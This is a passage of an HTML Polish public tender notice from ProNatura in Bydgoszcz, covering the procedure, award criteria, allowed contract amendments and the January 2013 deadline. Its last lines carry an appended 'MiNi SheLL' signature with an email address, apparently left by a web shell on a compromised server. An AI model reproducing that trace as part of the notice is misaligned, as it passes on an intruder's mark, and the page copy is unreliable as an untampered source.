- wskazanie podmiotu, na rzecz którego realizowane były roboty (odbiorców),<br>
- wskazanie zakresu (przedmiotu) wykonanych przez Wykonawcę robót,<br>
- wskazanie wartości robót,<br>
- wskazanie dat wykonania (rozpoczęcia i zakończenia),<br>
Do wykazu należy załączyć dokumenty potwierdzające, że wskazane w wykazie roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.<br></p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 PZP przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.<br>
1)Zmiana terminu wykonania zamówienia:<br>
a) Zmiany spowodowane warunkami atmosferycznymi w szczególności:<br>
- klęski żywiołowe,<br>
- warunki atmosferyczne, trudne do przewidzenia i znacznie odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów.<br>
b) Zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi archeologicznymi lub terenowymi, w szczególności:<br>
- niewypały i niewybuchy;<br>
- znaleziska archeologiczne;<br>
c) odmienne od przyjętych w dokumentacji projektowej warunki terenowe geologiczne lub błędy w inwentaryzacji istniejących obiektów budowlanych których działający z należytą starannością Wykonawca nie mógł wykryć. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności wstrzymanie robót przez Zamawiającego, z wyłączeniem przyczyn leżących po stronie Wykonawcy;<br>
d) Zmiany będące następstwem przedłużających się terminów uzyskania wymaganych opinii, uzgodnień, sprawdzeń rozwiązań projektowych od właściwych podmiotów i organów lub wystąpienia innych okoliczności, których nie można było przewidzieć w chwili ogłoszenia o zamówieniu, z wyłączeniem przyczyn leżących po stronie Wykonawcy;<br>
e) Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek decyzji Zamawiającego lub zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmiany wytycznych dotyczących realizacji projektu;<br>
f) Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową.<br>
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 termin realizacji zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br>
2) Zmiana sposobu spełnienia świadczenia. Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br>
a) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości wykonywanych robót,<br>
b) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;<br>
c) odmienne od przyjętych warunki terenowe, w szczególności istnienie podziemnych niezinwentaryzowanych obiektów budowlanych;<br>
d) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.<br>
3) Pozostałe zmiany spowodowane następującymi okolicznościami:<br>
a) Siła wyższa (rozumiana jako zdarzenie o charakterze przypadkowym, nie do uniknięcia nad którym człowiek nie panuje, takie jak: katastrofy i zdarzenia nadzwyczajne, na przykład w postaci zaburzeń życia zbiorowego, wojny, zamieszek itp.) uniemożliwiająca wykonanie przedmiotu umowy zgodnie z zapisami SIWZ;<br>
b) Zmiana obowiązującej stawki VAT;<br>
c) Zmiana sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego Umowy o dofinansowanie z WFOŚiGW. Zmiany dostosują sposób rozliczeń lub płatności do zmienionej Umowy o dofinansowanie z WFOŚiGW,<br>
d) Niezawarcia z jakiegokolwiek powodu Umowy o dofinansowanie z WFOŚiGW, e) Rozwiązania, wygaśnięcia lub odstąpienia przez Zamawiającego lub WFOŚiGW od Umowy o dofinansowanie,<br>
f) Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek decyzji Zamawiającego;<br>
g) Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. Zmiany mogą dotyczyć zakresu wykonywanych prac, zmian dokumentacji i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których Zamawiający rezygnuje;<br></p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pronatura.bydgoszcz.pl, www.mkuok.nbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzygminny Kompleks Unieszkodliwiania Odpadów ProNatura sp.z o.o.<br>
ul. Kościuszki 53, 85-079 Bydgoszcz<br>.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2013 godzina 12:00, miejsce: Międzygminny Kompleks Unieszkodliwiania Odpadów ProNatura sp.z o.o.<br>
ul. Kościuszki 53, 85-079 Bydgoszcz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane jest ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Toruniu.<br>.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com